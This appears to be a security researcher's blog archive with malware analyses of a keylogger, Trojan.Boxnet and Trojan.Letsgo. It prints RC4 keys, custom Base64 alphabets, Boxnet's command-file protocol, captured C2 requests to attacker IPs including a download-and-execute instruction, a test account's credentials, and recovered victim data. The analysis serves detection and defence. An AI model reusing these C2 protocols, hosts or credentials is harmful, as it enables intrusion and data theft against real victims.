Author Archives: hbojaxhi

Today I will take a quick look at a keystroke logger whose unpacked version has a much lower detection rate on VT then its UPX packed version, and which uses RC4 encryption and Base64 encoding with a custom alphabet.

We picked up this file recently while observing some APT activity on a victim’s network, and this is yet another tool in these actors’ arsenal.

This keystroke logger does not have the ability to communicate over the wire, so if you find it in your environment your should look for other Trojans that would give the actors access to your network.

The characteristics of this file are shown below:

File Name:  BRKBL.exe
File Size:  6144 bytes
MD5:        8a4bdb85acdfbf77ccadc3415d848bd7
SHA1:       aa45d3596f00042eb2f0cd5a78d7666b3034f63d
PE Time:    0x49D5CB3B [Fri Apr 03 08:39:23 2009 UTC]
PEID Sig:   UPX 2.90 (LZMA)
VT:         9/43 on 2011-11-07 15:32:12 UTC
VT:         15/43 on 2012-29-02 16:44:27 UTC

Interestingly, the unpacked version of this file has a lower detection rate as of today:

File Name:  BRKBL-unpacked.exe
File Size:  8192 bytes
MD5:        ebdc4d363da8b97ab65df9bf921e1b56
SHA1:       c9754d84d9a2c925c0271ad36e572858637fa1cc
PE Time:    0x49D5CB3B [Fri Apr 03 08:39:23 2009 UTC]
VT:         3/43 on 2012-02-29 15:16:00 UTC

This keystroke logger logs the data in a file named C:\DOCUME~1\username\LOCALS~1\Temp\ade######.Tmp, where ###### is the YYMMDD of when the file is created.

The entrenchment location is: SOFTWARE\Microsoft\Windows\CurrentVersion\Run.

The captured window titles along with any keystrokes are first RC4 encrypted using this 128-bit key (0×02000008000302060001090801000702):

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F
00000000   02 00 00 08 00 03 02 06  00 01 09 08 01 00 07 02

In case you have never seen what the RC4 algorithm looks like in assembly, here is a peak at the building of the 256 byte table (0×00 – 0xFF) and the loop that mixes in the key:

Encrypting the data with RC4 is the easy part of the obfuscation employed by this Keystroke logger.

The RC4 encrypted data is then Base64 encoded using a custom alphabet. Typically, the custom alphabet is sitting somewhere within the binary file, so it would be easy to test out (e.x. look at http://www.cyberesi.com/2011/11/02/trojan-prime/).

In this keystroke logger the custom alphabet is implemented in logic and is thus not visible. So, I will share with you a little trick that I use to let the Trojan/Keylogger tell me what the alphabet is.

In order to determine the custom alphabet you first need to find the subroutine that will encode the data. The easiest thing to do (at least the first thing I try) to find the subroutine is to put a hardware breakpoint at the first byte of your plain text. In this case, this hardware breakpoint would have landed you at the RC4 encryption algorithm. Next, you put a hardware break point at the first byte of the RC4 encrypted data, which will land you somewhere in the middle of the subroutine that does the Base64 encoding. In this case, the beginning of the subroutine is at address 0×00401080.

Next, if you look at the argument passed to this subroutine you will see that among other things are:

1.  A pointer to where the RC4 encrypted data is located.
2.  The length of the encrypted data (change this to 0x30)
3.  A pointer to an output buffer (where the encoded data will end up).

The way to trick the keystroke logger (or any other Trojan for that matter) to give us the custom alphabet is to replace the RC4 encrypted data with this raw data:

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000   00 10 83 10 51 87 20 92  8B 30 D3 8F 41 14 93 51     ƒ Q‡ ’‹0Ó A “Q
00000010   55 97 61 96 9B 71 D7 9F  82 18 A3 92 59 A7 A2 9A   U—a–›qן‚ £’Y§¢š
00000020   AB B2 DB AF C3 1C B3 D3  5D B7 E3 9E BB F3 DF BF   «²Û¯Ã ³Ó]·ãž»óß¿

Where did this data come from, you may be wondering? Well, this data is what you get when you decode the standard Base64 alphabet itself (shown below):

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

And obviously, if you were to Base64 encode the raw data back, you would get the standard alphabet back.

Understanding precisely why this data will give us the custom alphabet requires a good understanding of the Base64 algorithm. However, the basic idea is that this data is special, in that when the encoding algorithm is performed on it, it produces index values 0 through 63 in order, thus forcing the Trojan to map the index values to its custom alphabet letters in order. As I said, this trick will work on any Trojan that uses the Base64.

So, once you pass this data to the algorithm you will find the custom alphabet on the output buffer. This Trojan uses this custom alphabet to Base64 encode the RC4 encrypted data:

16BGLQVafkpuz27CHMRWbglqv-38DINSXchmrw/49EJOTYdinsx0FKPUZejoty5A

Here are the strings of this Trojan (from the unpacked version):

Text strings referenced in BRKBL:.text
Address                              Disassembly                Text string
004012AA                             PUSH BRKBL.00403720        ASCII "Windows Title: %s"
00401450                             PUSH BRKBL.00403740        ASCII "%s <Buffer Full>"
00401475                             PUSH BRKBL.00403734        ASCII "%s<Enter>"
00401584                             PUSH BRKBL.00403760        ASCII "%s\ade%02d%02d%02d.Tmp"
004015B5                             PUSH BRKBL.0040375C        ASCII "%s"
00401618                             PUSH BRKBL.00403758        ASCII "a+"
00401630                             PUSH BRKBL.00403754        ASCII "%s|"
004016A8                             PUSH BRKBL.00403780        ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
004016D4                             PUSH BRKBL.00403778        ASCII "UPDATA"
00401A16 BRKBL.<ModuleEntryPoint>    PUSH EBP                   (Initial CPU selection)
00401B8B                             PUSH 10000                 UNICODE "ALLUSERSPROFILE=C:\Documents and Settings\All Users"

• In one of our recent engagements we found an interesting Trojan that we thought was worth blogging about, not because of its capability but rather because of the way it was being controlled.  Jared and I looked at this Trojan together and named it Trojan.Boxnet.

Summary

• Trojan.Boxnet uses the file sharing site www.box.net as a medium from where it receives commands from the attacker, and where it posts the results of the commands it executes on the host.  Box.net is also used as the medium to where exfiltrated files are posted, and from where additional tools/Trojans are downloaded.  The Trojan contains the credentials of a user account created by the attacker in the binary itself.  For the purposes of this analysis we have removed the original credentials, and inserted the credentials of a temporary account at box.net, created in order to dynamically analyze this Trojan.  This Trojan allows the attacker to do the following on a compromised system:

- List logical drives
- Execute a file
- Recursive directory listing
- Download a file from box.net
- Upload a file to box.net
- List running processes
- Terminate a process
- List Services
- Change the sleep time

• The credentials we created for this analysis are:
• Username: general-Tso@binkmail.com
• Password: iLuvData

Trojan.Boxnet Analysis

•  The characteristics of this Trojan (with its credentials removed) follow:

File Name:  BOX.exe
File Size:  26112 bytes
MD5:        36ebd337752cf1289178c37ad6884ae1
SHA1:       c098be5db3d00694d9ae7de068050f6e68bdf321
PE Time:    0x4CBCFE04 [Tue Oct 19 02:10:12 2010 UTC]
AV Hits:    6/42 (13.6%) [VirusTotal]
Sections (3):
  Name      Entropy  MD5
  .text     6.32     039c7c3d682f25bb739358e69534c870
  .rdata    4.58     fad0a8972f8674d7e912cb7076ba1738
  .data     4.72     e36ee6cbfb9403a0fe88d4c1ac00ef59

• When executed, this Trojan starts by creating a mutex named letusgoboxmm1.0  to ensure that only one instance of it is running on the system.
• As you may recall, if you have read some of our other posts, we analyzed another Trojan recently that creates a similar mutex named letusgohtppmmv2.0.0.1 (Trojan.Letsgo).  So, even though the communication protocols of Trojan.Letsgo and Trojan.Boxnet are completely different, they appear to be related.
• The Trojan then authenticates with box.net and uploads a file named: RE-victim-192.168.1.9.txt to box.net.  This file contains the following data:

report myself every 18000000
cur time:2011/09/18 01:28:04 Eastern Daylight Time
proxy:PROXY_TYPE_DIRECT

• So, the filename contains the system name: victim, and its internal IP address: 192.168.1.9.  The content of the posted file reports the Trojan’s sleep time in milliseconds (i.e. 5 hours in this case), as well as the systems current time along with time zone information, and its proxy settings.  The victim then sleeps for 5 hours.
• The Trojan then looks for a file that starts with “st-” to download from box.net.  The “st-” files are the means through which the attacker issues commands to the victim.  The structure of the “st-” file names is as follows:
• st-COMMAND-ARGUMENTS.txt.
• Where COMMAND is an upper case character.
• ARGUMENTS can be an argument to certain commands.
• The content of these “st-” filenames is also important for certain commands, while for certain commands no content is expected.
• If a command-filename file contains data, it is immediately deleted once the file has been downloaded.
• I think the first file with this name that the Trojan will find in the box.net account is one that will change the sleep time, since the call to sleep is made every time the Trojan is done posting data to box.net.  So, in order to interact with the Trojan, the attacker would need to change the default sleep time of 5 hours to perhaps a few seconds.  In fact, the minimum time that can be specified must be greater than 10 seconds:

00402382      .  83C4 04                 ADD ESP, 4
00402385      .  3D 10270000             CMP EAX, 2710
0040238A      .  0F8E 9E000000           JLE Box.0040242E

• In order to change the sleep time, the attacker would place a file on box.net that may have the following name: st-W-10001.txt
• The W command instructs the Trojan to change the default sleep time (think of W as wait perhaps).
• The second dash is required, and what follows it up to the extension of the filename is converted to an integer using the “atoi” call.  In this case we have specified 10001 milliseconds (i.e. 10.1 seconds).
• So, this command will make the Trojan look for additional “st-” files more frequently and thus interact with the attacker.
• Here is a list of the other commands that this Trojan understands:

 Filename:           COMMAND                 TROJAN ACTION
 st-D-.txt          Logical partitions      Uploads RE-victim-192.168.1.9-D.txt
 st-E-.txt          Execute a file          Uploads RE-victim-10001-E.txt
 st-F-#.txt         Recursive dir listing   Uploads RE-victim-192.168.1.9-F.txt
 st-G-file.exe.txt  Download a file         Uploads RE-victim-10001-G.txt
 st-P-.txt          Process list            Uploads RE-victim-192.168.1.9-P.txt
 st-S-.txt          Service list            Uploads RE-victim-192.168.1.9-S.txt
 st-T-.txt          Terminate process       Nothing is posted.
 st-U-.txt          Upload file             Uploads RE-victim-192.168.1.9-test.txt

• Some additional notes on these commands:
• Command E: if the execution fails, the Trojan uploads RE-victim-10001-Z.txt
• Command F: the # specifies the recursive depth to follow.
• Command G: the downloaded file is saved under: C:\Documents and Settings\username\file.exe
• Command T: the process to be terminated is specified by its name.
• Command U: the file to be uploaded is specified in the content of file st-U-.txt

• Here is a string dump from this Trojan:

Text strings referenced in Box:.text
Address    Disassembly                               Text string
00401092   PUSH Box.00407118                         ASCII "%d:%s %d    "
004011CD   PUSH Box.00407124                         ASCII 0A,"     Execu"
004013AB   PUSH Box.00407148                         ASCII "USERPROFILE"
004013B9   PUSH Box.00407140                         ASCII "windir"
004014BE   PUSH Box.00407154                         ASCII "Display Name      : %s
Service Name      : %s
Process Id      : %04x (%d) "
004015BB   PUSH Box.004071B4                         ASCII "%s\"
004015C2   MOV EDI, Box.004071AC                     ASCII "\*.*"
00401696   PUSH Box.004071A4                         ASCII "%s\%s"
004016C9   PUSH Box.0040719C                         ASCII "%s\%s"
00401790   PUSH Box.004071E0                         ASCII "%s"
004017DD   MOV EDI, Box.004071D8                     ASCII "     CDROM"
004017E4   MOV EDI, Box.004071C8                     ASCII "     Remove Disk"
004017EB   MOV EDI, Box.004071BC                     ASCII "     Hard Disk"
004018CE   PUSH Box.00407248                         ASCII "InternetQueryOption failed! (%d)"
004018E1   PUSH Box.00407244                         ASCII "%"
00401902   PUSH Box.00407224                         ASCII "PROXY_TYPE_AUTO_PROXY_URL:%s"
00401921   PUSH Box.0040720C                         ASCII "PROXY_TYPE_AUTO_DETECT"
0040193C   PUSH Box.004071F8                         ASCII "PROXY_TYPE_PROXY:%s"
00401958   PUSH Box.004071E4                         ASCII "PROXY_TYPE_DIRECT"
00401A86   PUSH Box.004072C8                         ASCII "letusgoboxmm1.0"
00401AB0   MOV EDI, Box.004072C4                     ASCII "st-"
00401ABA   PUSH Box.00407BD4                         ASCII "C:\Documents and Settings\username"
00401AC5   PUSH Box.00407AD0                         ASCII "C:\WINDOWS"
00401ACE   MOV EDI, Box.00407ABC                     ASCII "st-"
00401AD3   PUSH Box.00407D3C                         ASCII "10.125.2.150"
00401ADF   PUSH Box.00407CD8                         ASCII "victim"
00401AEE   PUSH Box.004079B8                         ASCII "PROXY_TYPE_DIRECT"
00401B60   PUSH Box.0040729E                         ASCII "iLuvData"
00401B65   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401C6F   PUSH Box.004073D8                         ASCII "%Y/%m/%d %X %z"
00401CAD   XOR EAX, EAX                              (Initial CPU selection)
00401CCF   PUSH Box.00407D3C                         ASCII "10.125.2.150"
00401CD8   PUSH Box.00407CD8                         ASCII "victim"
00401CE4   PUSH Box.004073C8                         ASCII "RE-%s-%s-P.txt"
00401CF3   PUSH Box.0040729E                         ASCII "iLuvData"
00401CF8   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401D46   PUSH Box.00407D3C                         ASCII "10.125.2.150"
00401D50   PUSH Box.00407CD8                         ASCII "victim"
00401D5D   PUSH Box.004073B8                         ASCII "RE-%s-%s-D.txt"
00401D6A   PUSH Box.0040729E                         ASCII "iLuvData"
00401D6F   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401E17   PUSH Box.00407D3C                         ASCII "10.125.2.150"
00401E20   PUSH Box.00407CD8                         ASCII "victim"
00401E2C   PUSH Box.004073A8                         ASCII "RE-%s-%s-F.txt"
00401E3B   PUSH Box.0040729E                         ASCII "iLuvData"
00401E40   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401E6C   MOV EDI, Box.00407398                     ASCII "list file error"
00401EA6   PUSH Box.00407CD8                         ASCII "victim"
00401EB1   PUSH Box.00407388                         ASCII "RE-%s-%d-Z.txt"
00401EBE   PUSH Box.0040729E                         ASCII "iLuvData"
00401EC3   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401EEF   PUSH Box.00407384                         ASCII "rb"
00401F26   PUSH Box.0040737C                         ASCII "open"
00401F4A   PUSH Box.00407CD8                         ASCII "victim"
00401F55   PUSH Box.0040736C                         ASCII "RE-%s-%d-E.txt"
00401F62   PUSH Box.0040729E                         ASCII "iLuvData"
00401F67   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00401F99   MOV EDI, Box.0040735C                     ASCII "execute error"
00401FE3   PUSH Box.00407CD8                         ASCII "victim"
00401FE8   PUSH Box.00407388                         ASCII "RE-%s-%d-Z.txt"
00402011   PUSH Box.00407BD4                         ASCII "C:\Documents and Settings\username"
0040201C   PUSH Box.004071A4                         ASCII "%s\%s"
00402031   PUSH Box.00407358                         ASCII "wb+"
0040209C   PUSH Box.00407CD8                         ASCII "victim"
004020A7   PUSH Box.00407348                         ASCII "RE-%s-%d-G.txt"
004020C1   MOV EDI, Box.00407334                     ASCII "get save file error"
0040210B   PUSH Box.00407CD8                         ASCII "victim"
00402110   PUSH Box.00407388                         ASCII "RE-%s-%d-Z.txt"
00402119   PUSH Box.0040729E                         ASCII "iLuvData"
0040211E   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
004021B2   PUSH Box.00407384                         ASCII "rb"
0040222C   PUSH Box.00407D3C                         ASCII "10.125.2.150"
00402231   PUSH Box.00407CD8                         ASCII "victim"
0040223C   PUSH Box.00407328                         ASCII "UP-%s-%s-%s"
00402255   PUSH Box.0040729E                         ASCII "iLuvData"
0040225A   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
004022B0   PUSH Box.00407D3C                         ASCII "10.125.2.150"
004022B9   PUSH Box.00407CD8                         ASCII "victim"
004022C5   PUSH Box.00407318                         ASCII "RE-%s-%s-S.txt"
004022D4   PUSH Box.0040729E                         ASCII "iLuvData"
004022D9   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
004023B9   PUSH Box.004079B8                         ASCII "PROXY_TYPE_DIRECT"
004023C0   PUSH Box.004072E8                         ASCII "report myself every %dcur time:%sproxy:%s"
004023D6   PUSH Box.00407D3C                         ASCII "10.125.2.150"
004023E0   PUSH Box.00407CD8                         ASCII "victim"
004023ED   PUSH Box.004072D8                         ASCII "RE-%s-%s.txt"
004023F6   PUSH Box.0040729E                         ASCII "iLuvData"
004023FB   PUSH Box.00407272                         ASCII "general-Tso@binkmail.com"
00402522   MOV EDI, Box.00407414                     ASCII "http://www.box.net/index.php?rm=box_delete_items"
00402547   MOV EDI, Box.004073FC                     ASCII "q[item_typed_ids][0]=f_"
0040259B   MOV EDI, Box.004073EC                     ASCII "&request_token="
00402A19   MOV EDI, Box.00407520                     ASCII "https://www.box.net/login"
00402A77   MOV EDI, Box.0040750C                     ASCII "http://www.box.net"
00402A8E   PUSH Box.0040750C                         ASCII "http://www.box.net"
00402B34   PUSH Box.004074F8                         ASCII "request_token = '"
00402B53   MOV EDI, Box.004074F8                     ASCII "request_token = '"
00402BA2   MOV EDI, Box.00407520                     ASCII "https://www.box.net/login"
00402BD4   MOV EDI, Box.004074EC                     ASCII "login="
00402C2B   MOV EDI, Box.004074E0                     ASCII "&password="
00402C90   MOV EDI, Box.00407448                     ASCII "&remember_login=on&__login=1&reg_step=&submit1=1&folder=&skip_framework_login=&login_or_register_m
00402DAF   MOV EDI, Box.00407540                     ASCII "Content-Type: multipart/form-data; boundary="
00402E09   MOV EDI, Box.0040753C                     ASCII ""
00403009   MOV ESI, Box.00407734                     ASCII "----------GI3KM7cH2ae0Ef1cH2Ij5Ef1Ef1GI3"
00403024   MOV ESI, Box.00407704                     ASCII "------------GI3KM7cH2ae0Ef1cH2Ij5Ef1Ef1GI3"
00403037   MOV ESI, Box.004076D4                     ASCII "------------GI3KM7cH2ae0Ef1cH2Ij5Ef1Ef1GI3--"
00403099   MOV EDI, Box.004076A0                     ASCII "Content-Disposition: form-data; name="Filename""
004030C7   MOV EDI, Box.0040753C                     ASCII ""
00403124   MOV EDI, Box.0040753C                     ASCII ""
004031BC   MOV EDI, Box.00407664                     ASCII "Content-Disposition: form-data; name="Filedata"; filename=""
00403218   MOV EDI, Box.00407660                     ASCII """
00403247   MOV EDI, Box.00407634                     ASCII "Content-Type: application/octet-stream"
00403279   MOV EDI, Box.0040753C                     ASCII ""
0040330C   MOV EDI, Box.0040753C                     ASCII ""
0040339E   MOV EDI, Box.00407604                     ASCII "Content-Disposition: form-data; name="Upload""
004033C9   MOV EDI, Box.0040753C                     ASCII ""
004033F8   MOV EDI, Box.004075F4                     ASCII "Submit Query"
00403484   MOV EDI, Box.00407594                     ASCII "http://upload.box.net/index.php?rm=box_v2_flash_upload&folder_id=d_0&description=&PHPSESSID="
004034DE   MOV EDI, Box.00407570                     ASCII "&thumbnail_to_create=small_thumb"
00403719   MOV EDI, Box.004077C4                     ASCII "https://www.box.net//files"
00403819   MOV EDI, Box.0040750C                     ASCII "http://www.box.net"
00403830   PUSH Box.0040750C                         ASCII "http://www.box.net"
004038E3   PUSH Box.004074F8                         ASCII "request_token = '"
0040390F   MOV EDI, Box.004074F8                     ASCII "request_token = '"
00403978   PUSH Box.004077B4                         ASCII ""typed_id":"f_"
00403989   MOV EDI, Box.004077B4                     ASCII ""typed_id":"f_"
004039CB   PUSH Box.004077A4                         ASCII ""name":""
004039E0   MOV EDI, Box.004077A4                     ASCII ""name":""
00403A34   PUSH Box.00407ABC                         ASCII "st-"
00403A89   MOV EDI, Box.00407ABC                     ASCII "st-"
00403B06   MOV EDI, Box.00407760                     ASCII "http://www.box.net/index.php?rm=box_v2_download_file&file_id=f_"
00403C91   MOV EDI, Box.004077E0                     ASCII "Content-Type: application/x-www-form-urlencoded"
00404544   PUSH Box.0040781C                         ASCII "https"
00404564   PUSH Box.00407814                         ASCII "http"
004046AE   PUSH Box.00407830                         ASCII "Mozilla/4.0 (compatible; )"
004046E0   PUSH Box.00407824                         ASCII "selfset:%d"
004047B8   MOV DWORD PTR SS:[ESP+1C], Box.0040786C   ASCII "*/*"
0040481E   PUSH Box.00407860                         ASCII "HTTP/1.0"
00404824   PUSH Box.0040785C                         ASCII "GET"
00404846   MOV EDI, Box.0040784C                     ASCII "Accept: */*"
0040485B   PUSH Box.0040784C                         ASCII "Accept: */*"
004049B8   MOV DWORD PTR SS:[ESP+1C], Box.0040786C   ASCII "*/*"
00404A34   PUSH Box.00407860                         ASCII "HTTP/1.0"
00404A3D   PUSH Box.00407870                         ASCII "POST"
00404A5F   MOV EDI, Box.0040784C                     ASCII "Accept: */*"
00404A7A   PUSH Box.0040784C                         ASCII "Accept: */*"
00404C0F   MOV DWORD PTR SS:[ESP+20], Box.0040786C   ASCII "*/*"
00404C98   PUSH Box.00407860                         ASCII "HTTP/1.0"
00404C9E   PUSH Box.00407870                         ASCII "POST"
00404CC0   MOV EDI, Box.0040784C                     ASCII "Accept: */*"
00404CD5   PUSH Box.0040784C                         ASCII "Accept: */*"
00404DB7   PUSH Box.00407878                         ASCII "Content-Length: %d"
00404F6B   PUSH Box.00407898                         ASCII "Set-Cookie: "
00405079   PUSH Box.00407898                         ASCII "Set-Cookie: "
004054BF   PUSH 10000                                UNICODE "ALLUSERSPROFILE=C:\Documents and Settings\All Users"

• Today I will write about a Trojan that I will refer to as Trojan.Letsgo and some interesting artifacts I was able to recover from its C2 node located in China.
• However, before I write about Trojan.Letsgo, I have to talk about another Trojan that is very similar to other samples I have blogged about, that led me to Trojan.Letsgo.

• Today’s journey begins with a spear-phishing email that was mentioned here: http://www.lottaworld.com/images/fake_sasc_f-16.jpg
• The email contained a URL to a malicious file (no longer available): http://news.kmmowery.org/forum/f-16_sale.zip
• If you are interested in obtaining a sample of this file please let me know.
• This zip file contains a self extracting executable that is made to look like a folder, which has the following characteristics:

File Name:  US Arms Sales to Taiwan About F-16                                                             .exe
File Size:  146885 bytes
MD5:        2b1c03b4e34a123e5317182e6159e38a
SHA1:       1b4647c711f15b66bebe593ac215f0165fa12db8
PE Time:    0x4894133F [Sat Aug 02 07:56:47 2008 UTC]
PEID Sig:   RAR SFX
Sections (4):
 Name      Entropy  MD5
 .text     6.39     4b84ca66055922ffe3b7d0a45b63ad99
 .data     5.98     3fd04642b046387c6fd670a5951dfef8
 .idata    4.94     f85c9601de742e0bc2de9d7b285351dc
 .rsrc     5.15     d1b129bbe18e46e3b483a3f728bd87f6

• This self-extracting executable contains a SFX script that copies and executes a malicious file in the system. When you open the file with WirRAR you can see the script:

;下面的注释包含自解压脚本命令

Path=%temp%
SavePath
Setup=%temp%\cisvc.exe
Silent=1
Overwrite=2

• So, the “payload” if you will, of this self-extracting file has the following characteristics:

File Name:  cisvc.exe
File Size:  14336 bytes
MD5:        bcd2a7361d0a91a51123102a876c7af8
SHA1:       0ef31fea97a4938c59c92bacd1ea615bb8ca7659
PE Time:    0x4DA666E1 [Thu Apr 14 03:15:45 2011 UTC]
AV:         23/42 (54.8%) [VirusTotal]
Sections (3):
 Name      Entropy  MD5
 .text     6.1      1438df054ddec45c195c480250b6423f
 .rdata    4.49     cfb3a3f65536ef8c42452105c7e1e4c4
 .data     3.48     e09139527926e2c2a74ff253a2ff03c6

• This file was submitted to VirusTotal on 19 MAY 2011 and it has decent coverage there, except that the two major vendors, Symantec and McAfee, did not identify it as malicious.
• The behavior of this Trojan is similar to other samples that I have analyzed, in that, this Trojan:
  • 1. requests an HTML page (http://122.147.13.8/new/iistart.html)
  • 2. parses it for the comment tags
  • 3. Base64 decodes the message contained in the tag and
  • 4. either downloads and executes a file, or it sleeps.
• The biggest difference between this sample and previous ones is that this sample has a rather complex decryption algorithm for the file it downloads and executes.
• On 8 June 2011, this Trojan was instructed to download a file named update.gif:

 GET /new/iistart.html HTTP/1.1
 Accept: */*
 User-Agent: lt-764-238+Windows+NT+5.171
 Host: 122.147.13.8

 HTTP/1.1 200 OK
 Content-Length: 44
 Content-Type: text/html
 Last-Modified: Wed, 08 Jun 2011 00:19:01 GMT
 Accept-Ranges: bytes
 ETag: "a67db3aa7125cc1:102d"
 Server: Microsoft-IIS/6.0
 MicrosoftOfficeWebServer: 5.0_Pub
 X-Powered-By: ASP.NET
 Date: Wed, 08 Jun 2011 00:42:37 GMT

 

• The instruction decodes to:

d:202.105.39.39 update.gif

• So, the Trojan is instructed to download file: http://202.105.39.39/update.gif. This file is still hosted on this site as of the day of this post.
• This file is decrypted by cisvc.exe to produce the following file, which I have named Trojan.Letsgo:

File Name:  update.exe
File Size:  33829 bytes
MD5:        052ec04866e4a67f31845d656531830d
SHA1:       9860de85ea0d2b3022fa3d7bbbee0a13796258e6
PE Time:    0x4CD24D8F [Thu Nov 04 06:07:11 2010 UTC]
AV:         2/42 (4.8%) [VirusTotal]
Sections (4):
 Name      Entropy  MD5
 .text     6.49     6d5424af08903e9dcbd5b13956a9b58f
 .rdata    4.81     30d656a769947083207e04b46e74ceeb
 .data     4.93     7b331c3c724735e68e78b9e0680137a3
 .rsrc     2.88     23ee7cf17663c0aed3a2be7c0c89e237

Trojan.Letsgo Behavior

• This Trojan creates a mutex named: letusgohtppmmv2.0.0.1
• This Trojan is similar to another sample I have seen and will probably post an analysis for in the near future. The other sample creates a mutex named: letusgozrmmv0.9 that parses instructions in HTML files within <yahoo sb= … </yahoo> tags.
• Both samples use the same encode/decode algorithm to derive a custom Base64 alphabet for communication.
• The strings within update.exe give you a very good idea of the functionality that this Trojan supports, as well as the communication protocol. I will dump the strings of this file at the end of this post.
• This Trojan issues SQL queries to a web form (http://202.105.39.39/safe/1.asp) that acts as an interface to a database file (http://202.105.39.39/safe/1.mdb)
• When this Trojan is first executed it sends a SQL query to the database to see if it has already been registered there. If not, it will send a request to do so. Here is an example of this second type of request:

GET /safe/1.asp?rands=XJOTLVALQF&acc=vy&str=insert%20into%20tab_online%20
 (mode,clientname,clientip,accessip,onlinetime,lasttime,regcode)%20values%20
 ('0','victim','192.168.1.12','145.42.112.19','2011-06-08%2013:45:54',
 '2011-06-08%2013:45:54','NMQVPTXFBH') HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Accept: */*
Host: 202.105.39.39
Connection: Keep-Alive
Cookie: ASPSESSIONIDSADRDCST=JPKFDKEADBDBCOMGDJNKDDLN

• After the victim is successfully registered, it sends queries to the database for messages for its ID (in this case the assigned ID of the victim is 198)

GET /safe/1.asp?rands=DWLLOXLGLH&acc=vy&str=select%20top%201%20*%20
 from%20tab_message%20where%20toid%20=%20'198'%20order%20by%20id%20asc HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Accept: */*
Host: 202.105.39.39
Connection: Keep-Alive
Cookie: ASPSESSIONIDSADRDCST=JPKFDKEADBDBCOMGDJNKDDLN

• Here is what the 1.asp page looks like:

• At this time the database file 1.mdb is no longer available, therefore you get an error message. I managed to download a copy the MDB file before it was taken offline.
• The file consists of three tables:
  • TAB_FILE
  • TAB_MESSAGE
  • TAB_ONLINE
• As mentioned, table named TAB_ONLINE shows the systems that have been registered in the database:

id

mode

clientname

clientip

accessip

onlinetime

lasttime

regcode

190

1

MICROSOF-8E329D

192.168.0.115

223.166.4.246

2011-06-08 08:50:14

2011-06-08 08:50:14

SGZMMZJBMD

191

0

isabella-272349

10.0.2.15

OMITTED

2011-06-08 03:45:46

2011-06-08 03:48:50

NHAPUXVYED

192

0

home-off-d5f0ac

172.16.2.67

OMITTED

2011-06-07 23:38:31

2011-06-07 23:38:58

FEGCQGCSAR

193

0

brbrb-d8fb22af1

10.14.23.2

OMITTED

2010-02-24 16:46:07

2010-02-24 16:46:34

FVZYWMWCJX

194

0

BB-01-65

111.5.98.202

OMITTED

2011-06-08 12:37:31

2011-06-08 12:42:32

RHCYQSBCXD

195

0

pc

172.16.0.1

OMITTED

2011-06-08 10:19:37

2011-06-08 10:19:55

CBHTKATMXA

• I believe the first system on the list (IP 223.166.4.246 China) is the IP controlling the rest of the systems.

• The TAB_MESSAGE table contains instructions that can be issued to the various victims, as well as messages from the victim to the C2 node with updates on the progress of tasks being performed. These instructions are Base64 encoded using a custom alphabet that is scrambled with each message (more on this later). The encodenum value determines how the alphabet is scrambled.

id

message
action

fromid

toid

encode
num

message
totallength

message
piecelength

message
pieceindex

messagecontent

message
name

1862

remove

204

205

14543

6

6

0

qwrXCNGo

remove

1863

info

206

204

14517

42

42

0

tCk1tFl1rPkUtCR2_Pl1RW_jK.Y8zlkRzlkRzlkRzlkRzlkRzlkRzlkR

info

1864

info

206

204

14592

42

42

0

0Zgr0zSr1fhF0ocRbfSrcHbXaLg79Shc9Shc9Shc9Shc9Shc9Shc9Shc

info

1865

info

206

204

14651

42

42

0

kSWdk6WdYS7ekJtjvSWdtGvPXbiU3W7t3W7t3W7t3W7t3W7t3W7t3W7t

info

1866

info

206

204

14781

42

42

0

kSVdk6WdYS7ekJtjvSWdtGvPXbiU3W7t3W7t3W7t3W7t3W7t3W7t3W7t

info

1867

info

206

204

14866

42

42

0

86QXg6ZXj5EMg2Ql85ZXQ78pGvK3NZEQNZEQNZEQNZEQNZEQNZEQNZEQ

info

1868

info

206

204

14912

42

42

0

pQVSvQUSw3V1vjMrp3USMCpo7ckA4UVM4UVM4UVM4UVM4UVM4UVM4UVM

info

• Finally, the TAB_FILE table contains several files that the attacker can instruct the victims to download. Furthermore, this table will also contain the data of files being exfiltrated from victim systems.
• These files are again Base64 encoded using a custom alphabet that is scrambled for each chunk of data by the encodernum value.
• When I downloaded this database file, I noticed the messages above (info), which when decoded indicated to me that a 80 MB file was being uploaded to the database.
• The FILE_TAB confirmed this, by showing that a file named qb.rar was being uploaded as shown below:

• As you can see, the filepieceindex keeps track of the chunks of the files that are too large and have to be split to be stored in the database.
• After decoding the qb.rar file, I found out that it was password protected and the content was encrypted.
• In an attempt to recover the password (since the command to create the RAR archive would have been sent as a message), I decoded all the available messages, but this process did not yield the password, since at this point the command was already executed, and the message had been deleted.
• So, I started digging around the database file for deleted but not overwritten messages. Unfortunately, none of the messages I recovered were the command that created the RAR archive.
• I did however, confirm that the attacker had compromised and had interacted with at least two systems of a law firm and at least one system of a pro democracy organization.
• One of the messages I recovered from the system of the pro democracy organization showed that the attacker had executed the ipconfig /all command on that system:

ipconfig /all

Windows IP Configuration

Host Name . . . . . . . . . . . . : OMITTED
Primary Dns Suffix  . . . . . . . : OMITTED
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : OMITTED

Ethernet adapter Wireless Network Connection:

 Media State . . . . . . . . . . . : Media disconnected
 Description . . . . . . . . . . . : Dell Wireless 1397 WLAN Mini-Card
 Physical Address. . . . . . . . . : 00-25-56-10-EB-7A

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . : OMITTED
Description . . . . . . . . . . . : Intel(R) 82567LM Gigabit Network Connection
Physical Address. . . . . . . . . : 00-24-E8-A3-F0-27
